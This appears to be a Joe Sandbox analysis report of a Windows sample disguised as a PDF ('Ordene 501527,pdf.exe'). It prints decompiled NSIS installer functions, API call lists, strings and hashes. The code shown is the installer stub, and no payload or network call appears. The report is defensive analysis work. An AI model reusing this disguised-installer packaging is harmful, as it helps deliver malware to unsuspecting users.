					E0040612D(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a78 + _t78 * 2,  *0x7a8a78 +  *(_t82 + 0x4c) * 2, 0x7a69c0, 0);
					_t63 =  *0x7a69c0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a69c2;
						 *((short*)(E00405B5D(0x7a69c2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040625F(_t86, E00405B30(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B7C(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x0040396d
0x00403973
0x0040397c
0x00403983
0x00403985
0x00403999
0x004039ab
0x004039b4
0x004039bd
0x004039c4
0x004039c9
0x004039d0
0x004039e3
0x004039e3
0x004039ee
0x00403987
0x00403992
0x00403992
0x004039f3
0x004039fd
0x00403a06
0x00403a0b
0x00403a1c
0x00403aae
0x00403ab6
0x00403abf
0x00403abf
0x00403ad5
0x00403adb
0x00403ae9
0x00403b6a
0x00403b72
0x00403b7c
0x00403b81
0x00403b87
0x00403c11
0x00403c16
0x00403c18
0x00403c34
0x00000000
0x00403c34
0x00403c1a
0x00403c20
0x00403c28
0x00403c28
0x00000000
0x00403c20
0x00403b95
0x00403ba0
0x00403ba5
0x00403ba7
0x00403bae
0x00403bae
0x00403bb9
0x00403bc1
0x00403bc3
0x00403bc5
0x00403bce
0x00403bd1
0x00403bd7
0x00403bd7
0x00403bf6
0x00403c07
0x00000000
0x00403c0c
0x00403b74
0x00403b76
0x00000000
0x00403aeb
0x00403aeb
0x00403af7
0x00403b01
0x00403b07
0x00403b0c
0x00403b1b
0x00403c39
0x00403c39
0x00000000
0x00403c39
0x00403b2a
0x00403b65
0x00000000
0x00403b65
0x00403a22
0x00403a22
0x00403a25
0x00403a27
0x00000000
0x00000000
0x00403a35
0x00403a47
0x00403a4c
0x00403a55
0x00000000
0x00000000
0x00403a5b
0x00403a5d
0x00403a6a
0x00403a6a
0x00403a73
0x00403a79
0x00403aa1
0x00403aa9
0x00000000
0x00403a8b
0x00403a8c
0x00403a95
0x00403a9b
0x00403a9c
0x00000000
0x00403a9c
0x00403a97
0x00403a99
0x00000000
0x00000000
0x00000000
0x00403a99
0x00403a79

APIs

Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666

lstrcatW.KERNEL32(1033,007A1F20), ref: 004039EE
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A6E
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A81
GetFileAttributesW.KERNEL32(Call), ref: 00403A8C
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4), ref: 00403AD5

Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3

RegisterClassW.USER32(007A79C0), ref: 00403B12
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B2A
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B5F
ShowWindow.USER32(00000005,00000000), ref: 00403B95
GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BC1
GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BCE
RegisterClassW.USER32(007A79C0), ref: 00403BD7
DialogBoxParamW.USER32(?,00000000,00403D1B,00000000), ref: 00403BF6

Strings

1033, xrefs: 0040398D, 004039E9
.exe, xrefs: 00403A7B
.DEFAULT\Control Panel\International, xrefs: 004039D9
RichEd32, xrefs: 00403BA9
RichEdit, xrefs: 00403BC8
RichEd20, xrefs: 00403B9B
"C:\Users\user\Desktop\Ordene 501527,pdf.exe" , xrefs: 00403971
RichEdit20W, xrefs: 00403BB9, 00403BBF
Call, xrefs: 00403A35, 00403A3E, 00403A4C, 00403A9B, 00403AA1
_Nb, xrefs: 00403AF1, 00403B59
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4, xrefs: 004039FD, 00403A05, 00403AA8, 00403AAE, 00403ABE
C:\Users\user\AppData\Local\Temp\, xrefs: 00403979
Control Panel\Desktop\ResourceLocale, xrefs: 004039A1

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2815714544
Opcode ID: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
Instruction ID: 0f1e86156467dc572bfe90fa2eb59b903a3bd9170c228be251d5c9c569d222eb
Opcode Fuzzy Hash: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
Instruction Fuzzy Hash: 9861C371200604AED720AF669D45F2B3A6CEBC5B49F00853FF941B62E2DB7C69118A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402EC1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\Ordene 501527,pdf.exe";
				 *0x7a8a30 = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\Ordene 501527,pdf.exe", 0x400);
				_t89 = E00405D51(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E0040625F(L"C:\\Users\\Arthur\\Desktop", _t91);
				E0040625F(0x7b7000, E00405B7C(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7976dc = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E5D(1);
					__eflags =  *0x7a8a38 - _t82;
					if( *0x7a8a38 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403308( *0x7a8a38 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030FA(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7a8a34 = _t94;
							 *0x7a8a3c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a8a40 =  *0x7a8a40 + 1;
								__eflags =  *0x7a8a40;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405D0C(0x7a8a60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403308( *0x78b6d4);
					_t65 = E004032F2( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7a8a38) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004032F2(0x7976e0, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E5D(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7a8a38;
						if( *0x7a8a38 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E5D(0);
							}
							goto L20;
						}
						E00405D0C( &_v44, 0x7976e0, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x78b6d4; // 0x8fd55
						 *0x7a8ae0 =  *0x7a8ae0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7a8a38 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7976dc; // 0x91a80
						if(__eflags < 0) {
							_v12 = E0040672C(_v12, 0x7976e0, _t90);
						}
						 *0x78b6d4 =  *0x78b6d4 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402ec9
0x00402ecc
0x00402ecf
0x00402ed2
0x00402ed8
0x00402ee9
0x00402eee
0x00402f01
0x00402f06
0x00402f09
0x00402f0f
0x00000000
0x00402f11
0x00402f1c
0x00402f22
0x00402f33
0x00402f3a
0x00402f40
0x00402f42
0x00402f47
0x00402f49
0x00403036
0x00403038
0x0040303d
0x00403044
0x00000000
0x00000000
0x00403046
0x00403049
0x0040306d
0x00403072
0x00403078
0x00403083
0x00403088
0x0040308b
0x0040308c
0x0040308d
0x0040308f
0x00403094
0x00403097
0x004030aa
0x004030ae
0x004030b6
0x004030bb
0x004030bd
0x004030bd
0x004030bd
0x004030c5
0x004030c5
0x004030c8
0x004030c9
0x004030c9
0x004030cc
0x004030ce
0x004030ce
0x004030ce
0x004030d8
0x004030de
0x004030ec
0x004030f1
0x00000000
0x004030f1
0x00000000
0x00403097
0x00403051
0x0040305c
0x00403061
0x00403063
0x00000000
0x00000000
0x00403068
0x0040306b
0x00000000
0x00000000
0x00000000
0x00402f4f
0x00402f54
0x00402f59
0x00402f5d
0x00402f64
0x00402f69
0x00402f6b
0x00402f6d
0x00402f6d
0x00402f71
0x00402f76
0x00402f78
0x004030a2
0x00403099
0x00000000
0x00403099
0x00402f7e
0x00402f85
0x00403001
0x00403005
0x00403009
0x0040300e
0x00000000
0x00403005
0x00402f8e
0x00402f93
0x00402f96
0x00402f9b
0x00000000
0x00000000
0x00402f9d
0x00402fa4
0x00000000
0x00000000
0x00402fa6
0x00402fad
0x00000000
0x00000000
0x00402faf
0x00402fb6
0x00000000
0x00000000
0x00402fb8
0x00402fbf
0x00000000
0x00000000
0x00402fc1
0x00402fc7
0x00402fd0
0x00402fd6
0x00402fd9
0x00402fdb
0x00402fe1
0x00000000
0x00000000
0x00402fe7
0x00402feb
0x00402ff3
0x00402ff3
0x00402ff6
0x00402ff6
0x00402ff9
0x00402ffb
0x00402ffd
0x00402ffd
0x00000000
0x00402ffb
0x00402fed
0x00402ff1
0x00000000
0x00000000
0x00000000
0x0040300f
0x0040300f
0x00403015
0x00403021
0x00403021
0x00403024
0x0040302a
0x0040302c
0x0040302c
0x00403034
0x00403034
0x00000000
0x00403034

APIs

GetTickCount.KERNEL32 ref: 00402ED2
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ordene 501527,pdf.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE

Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Ordene 501527,pdf.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ordene 501527,pdf.exe,C:\Users\user\Desktop\Ordene 501527,pdf.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A

Strings

C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
C:\Users\user\Desktop\Ordene 501527,pdf.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
Null, xrefs: 00402FB8
vy, xrefs: 00402F4F
Error launching installer, xrefs: 00402F11
"C:\Users\user\Desktop\Ordene 501527,pdf.exe" , xrefs: 00402EC1
C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
Inst, xrefs: 00402FA6
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
soft, xrefs: 00402FAF

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ordene 501527,pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
API String ID: 4283519449-973641043
Opcode ID: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
Instruction ID: 5e1ca327f74bc56913369b9b8f7861415b50b435560b28898b8d4eae658a22e8
Opcode Fuzzy Hash: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
Instruction Fuzzy Hash: BC51F171901209AFDB20AF65DD85B9E7EA8EB4035AF10803BF505B62D5CB7C8E418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406281 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00406281(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x7a79fc - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x7a8a78 + _t43 * 2;
				_t44 = 0x7a69c0;
				_t110 = 0x7a69c0;
				if(_a4 >= 0x7a69c0 && _a4 - 0x7a69c0 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E00406281(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x7a69c0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x7a9000;
							E0040625F(_t110, (_t106 << 0xb) + 0x7a9000);
						} else {
							E004061A6(_t110,  *0x7a8a28);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004064F3(_t110);
						}
						goto L43;
					}
					_t86 =  *0x7a8a2c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x7a8ac4;
						if( *0x7a8ac4 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x7a8a24;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x7a8a28,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x7a8a28,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040612D( *0x7a8a78, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a78 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040);
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E00406281(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E0040625F(_a4, _t44);
			}

0x00406281
0x00406281
0x00406281
0x00406287
0x0040628c
0x0040629d
0x0040629d
0x004062a5
0x004062a6
0x004062a7
0x004062a8
0x004062ab
0x004062b3
0x004062b5
0x004062ce
0x004062d1
0x004062d1
0x004064cd
0x004064cd
0x004064d3
0x00000000
0x00000000
0x004062e1
0x004062e7
0x00000000
0x00000000
0x004062ef
0x004062f0
0x004062f2
0x004062f6
0x004062f9
0x004064ba
0x004064c8
0x004064cb
0x004064cb
0x004064bc
0x004064bf
0x004064c2
0x004064c4
0x004064c4
0x00000000
0x004064ba
0x004062ff
0x00406302
0x00406311
0x00406318
0x00406322
0x00406326
0x00406329
0x0040632c
0x00406331
0x00406336
0x0040633a
0x0040633d
0x0040645d
0x00406461
0x00406494
0x00406498
0x0040649d
0x004064a2
0x004064a2
0x004064a7
0x004064a8
0x004064ad
0x004064b0
0x004064b3
0x00000000
0x004064b3
0x00406463
0x00406466
0x00406469
0x0040647e
0x00406485
0x0040646b
0x00406472
0x00406472
0x0040648d
0x00406490
0x00406455
0x00406456
0x00406456
0x00000000
0x00406490
0x00406343
0x0040634b
0x0040634d
0x0040634e
0x00406367
0x00406367
0x0040636e
0x0040636e
0x00406375
0x00406379
0x00406379
0x0040637a
0x0040637c
0x004063b7
0x004063ba
0x004063ca
0x004063cd
0x004063d5
0x004063db
0x004063db
0x00406438
0x00406438
0x0040643a
0x00000000
0x00000000
0x004063df
0x004063e6
0x004063e7
0x004063e9
0x00406403
0x00406411
0x00406417
0x00406419
0x00406434
0x00406434
0x00406434
0x00000000
0x00406434
0x0040641f
0x0040642a
0x00406430
0x00406432
0x00000000
0x00000000
0x00000000
0x00406432
0x004063eb
0x004063ee
0x00000000
0x00000000
0x004063fd
0x004063ff
0x00406401
0x00000000
0x00000000
0x00000000
0x00406401
0x00000000
0x00406438
0x004063c2
0x00000000
0x0040637e
0x0040639c
0x004063a1
0x004063a5
0x00406445
0x00406445
0x00406448
0x00406450
0x00406450
0x00000000
0x00406448
0x004063ad
0x0040643c
0x0040643c
0x00406440
0x00000000
0x00000000
0x00406442
0x00000000
0x00406442
0x0040637c
0x00406350
0x00406355
0x00000000
0x00000000
0x00406357
0x0040635a
0x00000000
0x00000000
0x0040635c
0x0040635f
0x00000000
0x00406361
0x00406361
0x00000000
0x00406361
0x0040635f
0x004064d9
0x004064e4
0x004064f0
0x004064f0
0x00000000

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063C2
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004063D5
SHGetSpecialFolderLocation.SHELL32(004052FA,007924D8,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 00406411
SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 0040641F
CoTaskMemFree.OLE32(007924D8), ref: 0040642A
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406450
lstrlenW.KERNEL32(Call,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004064A8

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040644A
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406392
Call, xrefs: 004062AB, 00406386, 0040638D, 00406391, 004063AB, 004063AC, 004063C1, 004063D4, 004063F0, 0040641B, 0040644F, 00406455, 00406471, 00406484, 004064A1, 004064A7, 004064B3, 004064E6

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 890eb65aa38ad62bbc062fa9763307f13bf9a84b93246a35c735a8ee9e53aa4d
